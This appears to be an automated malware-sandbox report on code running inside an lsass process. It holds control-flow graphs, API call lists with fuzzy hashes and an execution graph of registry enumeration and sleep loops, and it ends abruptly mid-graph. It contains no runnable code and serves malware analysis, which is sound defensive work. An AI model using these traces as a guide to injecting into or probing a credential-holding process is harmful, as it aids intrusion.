                                                control_flow_graph 460 202c0ab69f0-202c0ab69f6 461 202c0ab6a31-202c0ab6a3b 460->461 462 202c0ab69f8-202c0ab69fb 460->462 463 202c0ab6b58-202c0ab6b6d 461->463 464 202c0ab69fd-202c0ab6a00 462->464 465 202c0ab6a25-202c0ab6a64 call 202c0ab70a0 462->465 468 202c0ab6b7c-202c0ab6b96 call 202c0ab6f34 463->468 469 202c0ab6b6f 463->469 466 202c0ab6a02-202c0ab6a05 464->466 467 202c0ab6a18 __scrt_dllmain_crt_thread_attach 464->467 483 202c0ab6a6a-202c0ab6a7f call 202c0ab6f34 465->483 484 202c0ab6b32 465->484 471 202c0ab6a11-202c0ab6a16 call 202c0ab6fe4 466->471 472 202c0ab6a07-202c0ab6a10 466->472 475 202c0ab6a1d-202c0ab6a24 467->475 481 202c0ab6bcf-202c0ab6c00 call 202c0ab7270 468->481 482 202c0ab6b98-202c0ab6bcd call 202c0ab705c call 202c0ab6efc call 202c0ab73f8 call 202c0ab7210 call 202c0ab7234 call 202c0ab708c 468->482 473 202c0ab6b71-202c0ab6b7b 469->473 471->475 492 202c0ab6c11-202c0ab6c17 481->492 493 202c0ab6c02-202c0ab6c08 481->493 482->473 495 202c0ab6b4a-202c0ab6b57 call 202c0ab7270 483->495 496 202c0ab6a85-202c0ab6a96 call 202c0ab6fa4 483->496 487 202c0ab6b34-202c0ab6b49 484->487 499 202c0ab6c5e-202c0ab6c74 call 202c0ab2858 492->499 500 202c0ab6c19-202c0ab6c23 492->500 493->492 498 202c0ab6c0a-202c0ab6c0c 493->498 495->463 510 202c0ab6a98-202c0ab6abc call 202c0ab73bc call 202c0ab6eec call 202c0ab6f18 call 202c0ab90dc 496->510 511 202c0ab6ae7-202c0ab6af1 call 202c0ab7210 496->511 505 202c0ab6cff-202c0ab6d0c 498->505 518 202c0ab6cac-202c0ab6cae 499->518 519 202c0ab6c76-202c0ab6c78 499->519 506 202c0ab6c2f-202c0ab6c3d call 202c0ac2758 500->506 507 202c0ab6c25-202c0ab6c2d 500->507 513 202c0ab6c43-202c0ab6c58 call 202c0ab69f0 506->513 529 202c0ab6cf5-202c0ab6cfd 506->529 507->513 510->511 563 202c0ab6abe-202c0ab6ac5 __scrt_dllmain_after_initialize_c 510->563 511->484 531 202c0ab6af3-202c0ab6aff call 202c0ab7260 511->531 513->499 513->529 527 202c0ab6cb0-202c0ab6cb3 518->527 528 202c0ab6cb5-202c0ab6cca call 202c0ab69f0 518->528 519->518 526 202c0ab6c7a-202c0ab6c9c call 202c0ab2858 call 202c0ab6b58 519->526 526->518 557 202c0ab6c9e-202c0ab6ca6 call 202c0ac2758 526->557 527->528 527->529 528->529 542 202c0ab6ccc-202c0ab6cd6 528->542 529->505 550 202c0ab6b01-202c0ab6b0b call 202c0ab7178 531->550 551 202c0ab6b25-202c0ab6b30 531->551 547 202c0ab6ce1-202c0ab6cf1 call 202c0ac2758 542->547 548 202c0ab6cd8-202c0ab6cdf 542->548 547->529 548->529 550->551 562 202c0ab6b0d-202c0ab6b1b 550->562 551->487 557->518 562->551 563->511 564 202c0ab6ac7-202c0ab6ae4 call 202c0ab9078 563->564 564->511
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959204478.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ab0000_lsass.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: c51e0415e1b0b4e1f38e484a64db28ef20f8ba36d571437a8af6fe375b171dd7
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: B081D331600741C6FA54AB29A4CD39D66E8FB46780F47402BEB49977B7DB7DC94E8700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: ce9526800f8a0f85bc88793c8825a76fdea1355de21c7931be02b529e6a7b8ed
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 00319032212B90D1FE11DB06A89C79D6294BB09BA0F1B052B9FBE473A2DF38C55D8304
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 3bab10382ae25f38b3b1a5c87630ee1a7d71810807f588bc5720f1820a17ff55
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: DE116D23318B40C6FB508B56E88C31D66A0F788FE4F054227EB5D87B95DF7AC9488744
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: c4d4982ed5f191253c8f6e8d384e846f457355d32d9817d38341f348d629b157
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: EAD19536208B88C6EA70DB1AE49835E77A0F788B84F110217EBDD47BA6DF39C555CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: f6eecbd787ff78f4e92c6b6fac0e43704a481cf27d926e02e8b7673ce402a933
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: D4319523705B95C2FF55DF56988C36D63A0FB44B84F0682279F9807B56EB38C4B98700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: d4c0bd763e822144200f078a16a066fcebdfd944db47271af984dff9e080ac38
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: 23111777615B80C2FB249B21E88D71E66A0BB48B85F06052BDB99077A6EF3EC51C8704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction ID: 38ba8f7b21269fd3b9bf4da63608bcae845370928ebf667d63f4109bac76b113
                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction Fuzzy Hash: 2351AD32211B81DAFB54CB15E48CB9D3795F384B88F528223DBA64778AEB75C859C708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: 58c620da79e6000e9b79ff87e859777da2d69fa67d42e0e12367462d5b8a3e82
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: CAF08263308B80D1FB109B53B98C19DA224AB58FD0F098133DF9A07B2ACE3DC4998700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 44c2d7fa17ed85bb862da8537152fd98739825cdb4636ec5640dd3ff4b972415
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 2FF01263315784D2FF549B60E8CC36D2360AF58B90F46211B975B46666DF39C49CC700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: aeb55cec6b7a55ca872fc64ee18e19171bdb6a382fd37deb22fb8e8d49dba66c
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 8602A536219BC0C6EBA08B55F49835EB7A1F385794F110117EBDE87BA9DB79C498CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: f7ed3af27d76bfccc9fb8471a0bf51769a4ebcf67aed316be1b93732fc8d91bd
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: 0B81BB33610750C9FB60AB6688CCBAD67A1F744BC8F464217DF4A53B97DB368449C710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: 9d399a640bb9f226b8de1ae05f8772ff06d01c88ddc70a103681ebeca164bd03
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: 9761C636519B80C6FA609B25F48C31EB7A1F388784F110217EBDD47BAACB78C568DB04
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 2edf33ed1164340e63f63a0d3027f3ef493e8ef5cc600c618098d4d6d1b67b67
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 2411A133F58B41C2F6B81168E5DE36D5041BB64B74F4B4627BB7B863E78B6A8C4A4300
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959204478.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ab0000_lsass.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 6e56fc8b63f1f048d3204ae722a941395d88e5c8d400caab7e798ae4ce33c819
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: DB11E532B54F80C5F6E41169E4DE3AD14406B57FBCF8B0637AB760EBDB8A1A8C4A4200
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: dbbd5d7f491f5f6cac3024bf119a0553ff861928dcc2bdfd02cc551a2ac0404d
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: E8112A2B709B81C2FB149B15F45C66D66A0F748B84F05412BDF9907796EF3EC518C704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959204478.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ab0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 843d508fee68e9f0da860d3dd1df250c16b123aac621513f78a37fb2d2a1be6c
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: CA518B32612740CAFB28DF29E89CB5D3795F344B98F528227DB1A4778AEB35D849C704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959204478.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ab0000_lsass.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: c2eb2bca5980e0c59ae566e84900ae8bcf2cadf27a87c2250409bce9c75e3fed
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 94314972211B40D6FB28DF1AE88CB1D37A4F740B98F168217AF5A07786DB39C949C709
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction ID: c9f716bf4cc3f8ec9a282e89e69f0f8b796e66f93dce3a389dc466fbe3e5612a
                                                • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction Fuzzy Hash: FC115B33518B98D2FB54DF66A88C21EB760F789F84F05421BDB9A03756DF39C0598744
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: f68ce4ff1c380156d6e01e187fc5e501ed0446d0c87c75e41adf4d4f80eeadcb
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: 4D51B5322187C1C2F6749F29A5DC3AE6651F785780F464227DFEA07B9BDE39C4298B40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 9136cd904abf1a888aa88204d6ce35162ce64a2a17a793135470f4bd62100658
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: 4A418073214B80C1EB609F26E48C79EA7A1F388784F424027EB8D87B99DB79C555CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: c1244e4e5751e4e33ab54398f15f8768373e8bd3d7510e7b3c46aef1a1838649
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: 81110836608BC0C6EB60CB16B48829AB7A4F7C9B90F554127EFDD83B5ADF38C4548B04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: 5ec152f602f6614b10d7d61dc62558a14f1fa2edeb9862266148b608519f7d2f
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: D4114C32208B8082EB618F15E48825D77A0F788B98F194226DFDD0BB69DF39C569CB04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 923404b4932ecc71181cb30068a9546cc491521e033fc7284cfb6fd6de67006a
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 4EF08223314B80D2FB059B41F48C69D7321AB88B90F4A5127EB9907B56CE3AC9ADD704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: d7467d53a769e4656bbbe4c3d3afebbbd9307ba23a939249af377e23a7e14c26
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: 7DE06D63214780D2FF044B50F88C6AC2222BB88780F4A4123DB690A297DE39C86DC704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959204478.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ab0000_lsass.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 679e5424aa469e90ece3b8af143238a50df9fedd07725b9b320bb21ab3ca171a
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 41E09231200B41E6FA049B51F4CD6ED23219B84740F5F5123975906253CE38C8CE8344
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2959470831.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_202c0ae0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 28ae63f6c094da995c863b700c8ad089c3ad79b3e7b2f39ac27c3d30d7f83160
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: F2217133604BD0C1FB118F5AA44C26EB3A0FB88B94F0A4113EF9C47B16EB78C55A8700

                                                Execution Graph

                                                Execution Coverage:0.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:68
                                                Total number of Limit Nodes:2
                                                execution_graph 14028 2a661301c28 14033 2a661301650 GetProcessHeap HeapAlloc 14028->14033 14030 2a661301c3e Sleep SleepEx 14031 2a661301c37 14030->14031 14031->14030 14032 2a6613015c0 StrCmpIW StrCmpW 14031->14032 14032->14031 14077 2a661301274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14033->14077 14035 2a661301678 14078 2a661301274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14035->14078 14037 2a661301689 14079 2a661301274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14037->14079 14039 2a661301692 14080 2a661301274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14039->14080 14041 2a66130169b 14042 2a6613016b6 RegOpenKeyExW 14041->14042 14043 2a6613016e8 RegOpenKeyExW 14042->14043 14044 2a6613018ce 14042->14044 14045 2a661301727 RegOpenKeyExW 14043->14045 14046 2a661301711 14043->14046 14044->14031 14047 2a66130174b 14045->14047 14048 2a661301762 RegOpenKeyExW 14045->14048 14081 2a6613012c8 RegQueryInfoKeyW 14046->14081 14091 2a66130104c RegQueryInfoKeyW 14047->14091 14052 2a661301786 14048->14052 14053 2a66130179d RegOpenKeyExW 14048->14053 14055 2a6613012c8 16 API calls 14052->14055 14056 2a6613017d8 RegOpenKeyExW 14053->14056 14057 2a6613017c1 14053->14057 14058 2a661301793 RegCloseKey 14055->14058 14060 2a6613017fc 14056->14060 14061 2a661301813 RegOpenKeyExW 14056->14061 14059 2a6613012c8 16 API calls 14057->14059 14058->14053 14064 2a6613017ce RegCloseKey 14059->14064 14065 2a6613012c8 16 API calls 14060->14065 14062 2a661301837 14061->14062 14063 2a66130184e RegOpenKeyExW 14061->14063 14067 2a66130104c 6 API calls 14062->14067 14068 2a661301889 RegOpenKeyExW 14063->14068 14069 2a661301872 14063->14069 14064->14056 14066 2a661301809 RegCloseKey 14065->14066 14066->14061 14070 2a661301844 RegCloseKey 14067->14070 14072 2a6613018ad 14068->14072 14073 2a6613018c4 RegCloseKey 14068->14073 14071 2a66130104c 6 API calls 14069->14071 14070->14063 14074 2a66130187f RegCloseKey 14071->14074 14075 2a66130104c 6 API calls 14072->14075 14073->14044 14074->14068 14076 2a6613018ba RegCloseKey 14075->14076 14076->14073 14077->14035 14078->14037 14079->14039 14080->14041 14082 2a661301499 RegCloseKey 14081->14082 14083 2a661301334 GetProcessHeap HeapAlloc 14081->14083 14082->14045 14084 2a66130135d RegEnumValueW 14083->14084 14085 2a661301485 GetProcessHeap HeapFree 14083->14085 14086 2a6613013af 14084->14086 14085->14082 14086->14084 14086->14085 14088 2a6613013dd GetProcessHeap HeapAlloc 14086->14088 14089 2a66130142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14086->14089 14090 2a661301413 GetProcessHeap HeapFree 14086->14090 14097 2a661301554 14086->14097 14088->14086 14089->14086 14090->14089 14092 2a6613011b5 RegCloseKey 14091->14092 14095 2a6613010b9 14091->14095 14092->14048 14093 